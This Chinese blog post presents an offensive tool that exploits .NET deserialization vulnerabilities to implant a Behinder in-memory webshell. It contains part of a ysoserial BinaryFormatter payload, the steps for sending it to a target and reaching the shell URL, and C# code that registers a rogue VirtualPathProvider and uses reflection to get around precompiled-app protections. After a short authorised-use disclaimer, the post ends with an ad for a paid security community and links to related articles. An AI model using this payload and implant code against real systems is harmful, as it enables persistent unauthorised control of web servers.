.NET 一款反序列化打入冰蝎内存马的工具

于 2024-08-02 08:30:00 发布
阅读量494 收藏 9
点赞数 10
文章标签: 安全 矩阵 web安全 .net
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ahhacker86/article/details/140839829
版权

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4BehinderWebShell 是一款利用.NET反序列化漏洞向内存中植入冰蝎WebShell的工具。通过这种方式,可以使用冰蝎客户端连接内存马获取WebShell,并且支持在.NET预编译环境下使用。以下是对该工具的详细介绍,包括其使用方法和代码解释。

图片

03使用方法

使用ysoserial生成冰蝎内存马的反序列化攻击负载,用于触发漏洞部分。以下是一个通过BinaryFormatter触发反序列化漏洞的示例负载,由于比较长此处仅展示一部分内容。

AAEAAAD/AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdG.........................

接着,将生成的反序列化攻击负载通过POST请求发送到目标服务器,触发.NET反序列化漏洞,成功后即植入冰蝎内存马。访问以下URL即可加载WebShell:

http://localhost:51448/fakepath31337/{0}.aspx

此处的fakepath31337路径可以自定义,通过修改Poc里的参数即可,其中{0}表示占位符,可以替换成任意字符,比如请求 /fakepath31337/36.aspx

图片

上图中没有出现异常错误,随后,通过冰蝎客户端成功连接到内存马,执行命令如下图所示

图片

04编码实现

Sharp4BehinderWebShell 主要通过注册自定义的虚拟路径提供程序(VirtualPathProvider)并结合反序列化攻击负载,实现对目标服务器的控制。首先该类继承自 System.Web.Hosting.VirtualPathProvider,用于注册虚拟路径提供程序,重写其方法以提供自定义路径和文件内容。

public class SamplePathProvider : System.Web.Hosting.VirtualPathProvider
{
    private string _virtualDir;
    private string _fileContent;

    public SamplePathProvider(string virtualDir, string fileContent)
      : base()
    {
        _virtualDir = "/" + virtualDir.Replace(@"\", "/");
        _virtualDir = _virtualDir.Replace("//", "/").TrimEnd('/');

        // 初始化文件内容
        _fileContent = fileContent;
    }

    protected override void Initialize()
    {
        // 初始化操作,可以在这里添加自定义逻辑
    }
}

接着,该SampleVirtualFile类继承自 System.Web.Hosting.VirtualFile,用于表示虚拟文件,并提供文件内容,具体代码如下所示。

public class SampleVirtualFile : System.Web.Hosting.VirtualFile
{
    private string _fileContent;

    public bool Exists => true;

    public SampleVirtualFile(string virtualPath, string fileContent)
      : base(virtualPath)
    {
        // 初始化文件内容
        _fileContent = fileContent;
    }

    public override System.IO.Stream Open()
    {
        return new System.IO.MemoryStream(System.Text.Encoding.UTF8.GetBytes(_fileContent));
    }
}

同时,工具通过反射修改 System.Web.Compilation.BuildManager 类的私有字段,动态关闭预编译设置。如下所示。

if (System.Web.Compilation.BuildManager.IsPrecompiledApp)
{
    var typeBuildManager = typeof(System.Web.Compilation.BuildManager);
    var field_theBuildManager = typeBuildManager.GetField("_theBuildManager", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
    var field_isPrecompiledAppComputed = typeBuildManager.GetField("_isPrecompiledAppComputed", System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic);
    var field_isPrecompiledApp = typeBuildManager.GetField("_isPrecompiledApp", System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic);

    var field_theBuildManager_instance = field_theBuildManager.GetValue(null);
    var field_isPrecompiledAppComputed_oldValue = field_isPrecompiledAppComputed.GetValue(field_theBuildManager_instance);
    var field_isPrecompiledApp_oldValue = field_isPrecompiledApp.GetValue(field_theBuildManager_instance);

    field_isPrecompiledAppComputed.SetValue(field_theBuildManager_instance, true);
    field_isPrecompiledApp.SetValue(field_theBuildManager_instance, false);

    // 注册自定义的 VirtualPathProvider
    System.Web.Hosting.HostingEnvironment.RegisterVirtualPathProvider(sampleProvider);
    field_isPrecompiledAppComputed.SetValue(field_theBuildManager_instance, field_isPrecompiledAppComputed_oldValue);
    field_isPrecompiledApp.SetValue(field_theBuildManager_instance, field_isPrecompiledApp_oldValue);
}

这里,通过 Compilation.BuildManager.IsPrecompiledApp 检查应用是否为预编译,最后,RegisterVirtualPathProvider(sampleProvider) 注册自定义的虚拟路径提供程序。

Sharp4BehinderWebShell 提供了一种利用.NET反序列化漏洞向内存中植入冰蝎WebShell的手段,可以绕过.NET预编译环境的限制,实现对目标系统的控制。

05.NET安全星球

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

图片

图片

20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

图片

我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

图片

dot.Net安全矩阵
关注
  • 10
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
C#使用Json.Net进行序列化和反序列化及定制化
12-31
.Net阵营中,Json.Net是由官方推荐的高性能开源序列化/反序列化工具,其官方网站:https://www.newtonsoft.com/json; 一、将对象序列化为Json格式字符串 首先是正常的序列化操作,对于给定的类: private class ...
.NET中JSON的序列化和反序列化的几种方式
10-18
JSON是一种轻量级的数据交换格式。这篇文章主要介绍了.NET中JSON的序列化和反序列化的几种方式,非常具有实用价值,需要的朋友可以参考下
反序列化分析到shiro注入WebSocket内存
weixin_42508548的博客
01-30 916
因为一直想要学习反序列化相关的内容,并且从反序列化延伸出来学习内存,所以花了很大一部分精力,从CC1到CB,整体地过了一遍反序列化利用链。在学习过程中,发现一个很有意思的内存WebSocket内存,感觉如果用的好的话,挺符合实际需要的,所以自己大体利用了一下,很成功,在这里整理分享出来。
Goby 利用内存中的一些技术细节【技术篇】
m0_46699477的博客
03-28 408
前置漏洞的利用、内存的生成以及内存的使用
用 Goby 通过反序列化漏洞一键打入内存【利用篇】
m0_46699477的博客
01-16 1109
Goby 使用者无需任何配置,就可以一键打入内存
渗透测试工具大全
2401_84466336的博客
05-24 1213
所有工具仅能在取得足够合法授权的企业安全建设中使用,在使用所有工具过程中,您应确保自己所有行为符合当地的法律法规。如您在使用所有工具的过程中存在任何非法行为,您将自行承担所有后果,所有工具所有开发者和所有贡献者不承担任何法律及连带责任。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。3不会收取任何广告费用,展示的所有工具链接与本人无任何利害关系。
Weblogic xmldecoder反序列化中的命令回显与内存总结
已清空
10-11 76
首发先知社区:https://xz.aliyun.com/t/10323 虽说weblogic xmldecoder的洞是几年前的,但是之前内外网场景下老是遇到,大多数情况是不出网、不方便写webshell(weblogic负载均衡,轮询)场景,需要解决的问题就是回显构造和内存的植入。所以想花个时间来总结一下。 而说到回显、内存植入的文章网上越来越多,看了文章都知道有哪些方法,比如回显问题大...
vulntarget-m(星期五实验室)
ka_ka11的博客
03-04 1076
在c3p0+FastJson利用其他文章中介绍的是需要依赖像cc链这样的反序列化链,但其实是不需要的,因为FastJson全版本都存在原生反序列化漏洞,且是通过TemplatesImpl加载类,更加适合。搭建springboot服务,引入依赖,进行编译,这里 尝试了很多次,最后也没有成功,奈何脚本小子不会java呀,唉,留到后面再补吧。由于电脑芯片问题,导致虚拟机必须重启,部分服务关闭,内存失效(再次打入内存可能无法打入,或者无法连接内存)
Notes Sixth day-渗透攻击-红队-打入内网
qq_34801745的博客
09-22 3653
** Notes Sixth day-渗透攻击-红队-信息收集(dayu) ** 作者:大余 时间:2020-09-22 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更好的继
渗透测试 ( 0 ) --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
freeking101的博客
06-12 3759
渗透测试 --- http协议、XSS、CSRF、文件上传、文件包含、反序列化漏洞
Notes Ninth Day-渗透攻击-红队-打入内网
qq_34801745的博客
09-25 8103
** Notes Ninth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-09-25 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更好的继
浅谈.Net中的序列化和反序列化
12-17
.NET中的序列化和反序列化是开发者在编程过程中...总之,序列化和反序列化.NET开发中的关键工具,它们使我们能够在各种场景下管理和操作对象的状态。理解并熟练运用这些技术,对于提升应用程序的功能和性能至关重要。
ASP.NET中JSON的序列化和反序列化使用说明
10-28
JSON是专门为浏览器中的网页上运行的JavaScript代码而设计的一种数据格式。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1352
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
Excel模拟计算演示-以矩阵乘计算密度为例
Hi20240217的博客
07-25 344
安装好CUDA之后,/usr/local/cuda-12.1/tools/CUDA_Occupancy_Calculator.xls里会看到"=TABLE(,B17)"这样的表达式,原来是模拟计算的结果。
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 809
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
WEB安全】 PHP基础完整教学上(超详细)
weixin_60838266的博客
07-28 726
本文为Web安全学习中需要了解的php知识提高学习,PHP:Hypertext Preprocessor,中文名:“超文本预处理器”是一种通用开源脚本语言。语法吸收了C语言、java和Perl的特点,利于学习,使用广泛,主要适用于web开发领域。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HTML(标准通用标记语言下的一个应用)文档中去执行,执行效率比完全生成HTML标记的CGI要高许多;PHP还可以执行编译后代码,编译可以达到加密和优化代码运行,使代码运行更快。
WEB安全】 PHP基础文件知识完整教学中(超详细)
最新发布
weixin_60838266的博客
07-29 595
正则表达式是用于描述字符排列和匹配模式的一种语法规则。它主要用于字符串的模式分割、匹配、查找及替换操作。到目前为止,我们前面所用过的精确(文本)匹配也是一种正则表达式。在PHP中,正则表达式一般是由正规字符和一些特殊字符(类似于通配符)联合构成的一个文本模式的程序性描述。正则表达式较重要和较有用的角色是验证用户数据的有效性检查。PHP中,正则表达式有三个作用:匹配,也常常用于从字符串中析取信息。用新文本代替匹配文本。将一个字符串拆分为一组更小的信息块。
.net core 中的序列化和反序列化
05-21
.NET Core 中,我们可以使用以下两种方式进行对象序列化和反序列化: 1. BinaryFormatter:BinaryFormatter 是 .NET Framework 中常用的一种序列化方式,它可以将对象序列化为二进制格式,也可以将二进制格式反序列化为对象。在 .NET Core 中,BinaryFormatter 仍然可以使用,但是需要注意的是,它只支持 .NET Framework 中的类型,不支持 .NET Core 中新增的类型。 以下是使用 BinaryFormatter 进行序列化和反序列化的示例代码: ```csharp using System; using System.IO; using System.Runtime.Serialization.Formatters.Binary; [Serializable] public class Person { public string Name { get; set; } public int Age { get; set; } } public class Program { public static void Main() { // 创建一个 Person 对象 var person = new Person { Name = "Tom", Age = 30 }; // 将 Person 对象序列化为 byte[] var formatter = new BinaryFormatter(); using (var stream = new MemoryStream()) { formatter.Serialize(stream, person); var bytes = stream.ToArray(); } // 将 byte[] 反序列化为 Person 对象 using (var stream = new MemoryStream(bytes)) { var p = (Person)formatter.Deserialize(stream); Console.WriteLine($"Name: {p.Name}, Age: {p.Age}"); } } } ``` 2. Newtonsoft.Json:Newtonsoft.Json 是一个流行的 JSON 序列化/反序列化库,它支持 .NET Core 中的所有类型,并且性能也非常不错。我们可以通过 NuGet 引用 Newtonsoft.Json 库,并使用 JsonConvert 类进行序列化和反序列化。 以下是使用 Newtonsoft.Json 进行序列化和反序列化的示例代码: ```csharp using System; using Newtonsoft.Json; public class Person { public string Name { get; set; } public int Age { get; set; } } public class Program { public static void Main() { // 创建一个 Person 对象 var person = new Person { Name = "Tom", Age = 30 }; // 将 Person 对象序列化为 JSON 字符串 var json = JsonConvert.SerializeObject(person); Console.WriteLine(json); // 将 JSON 字符串反序列化为 Person 对象 var p = JsonConvert.DeserializeObject<Person>(json); Console.WriteLine($"Name: {p.Name}, Age: {p.Age}"); } } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值